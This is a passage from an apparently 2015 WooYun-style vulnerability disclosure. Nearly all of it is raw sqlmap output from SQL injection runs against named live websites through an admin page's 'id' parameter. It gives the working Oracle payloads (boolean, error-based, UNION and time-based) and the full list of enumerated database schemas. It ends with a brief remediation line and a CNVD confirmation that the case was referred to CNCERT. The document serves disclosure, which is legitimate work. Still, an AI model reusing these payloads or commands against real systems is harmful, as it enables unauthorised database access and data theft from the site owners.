R(114)||CHR(98)||CHR(58)||CHR(109)||CHR(113)||CHR(112)||CHR(85)||CHR(79)||CHR(99
)||CHR(90)||CHR(109)||CHR(80)||CHR(73)||CHR(58)||CHR(108)||CHR(105)||CHR(112)||C
HR(58) FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: lb=save&id=241 AND 2218=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(111
)||CHR(106)||CHR(118),5)
---
[07:29:18] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:29:18] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:29:18] [INFO] fetching database (schema) names
[07:29:18] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:29:18] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:29:18] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\www.lqmyjj.com'
[*] shutting down at 07:29:18


http://www.sxjhjj.com/admin_manage/system/mg_editwz.asp?lb=save&id=241

[root@Hacker~]# Sqlmap -u "http://www.sxjhjj.com/admin_manage/system/mg_editwz.a
sp?lb=save&id=241" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:31:40
[07:31:40] [INFO] resuming back-end DBMS 'oracle'
[07:31:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lb=save&id=241 AND 8957=8957
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: lb=save&id=241 AND 9577=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR
(104)||CHR(102)||CHR(105)||CHR(58)||(SELECT (CASE WHEN (9577=9577) THEN 1 ELSE 0
END) FROM DUAL)||CHR(58)||CHR(100)||CHR(100)||CHR(98)||CHR(58)||CHR(62))) FROM
DUAL)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: lb=save&id=-1331 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(104)||CH
R(102)||CHR(105)||CHR(58)||CHR(70)||CHR(75)||CHR(119)||CHR(105)||CHR(67)||CHR(10
8)||CHR(69)||CHR(72)||CHR(106)||CHR(72)||CHR(58)||CHR(100)||CHR(100)||CHR(98)||C
HR(58) FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: lb=save&id=241 AND 4658=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(79)
||CHR(121)||CHR(82),5)
---
[07:31:40] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:31:40] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:31:40] [INFO] fetching database (schema) names
[07:31:40] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:31:40] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:31:40] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\www.sxjhjj.com'
[*] shutting down at 07:31:40


....

漏洞证明:

rt

修复方案:

过滤 权限

版权声明:转载请注明来源 Hero@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-05-30 00:54

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论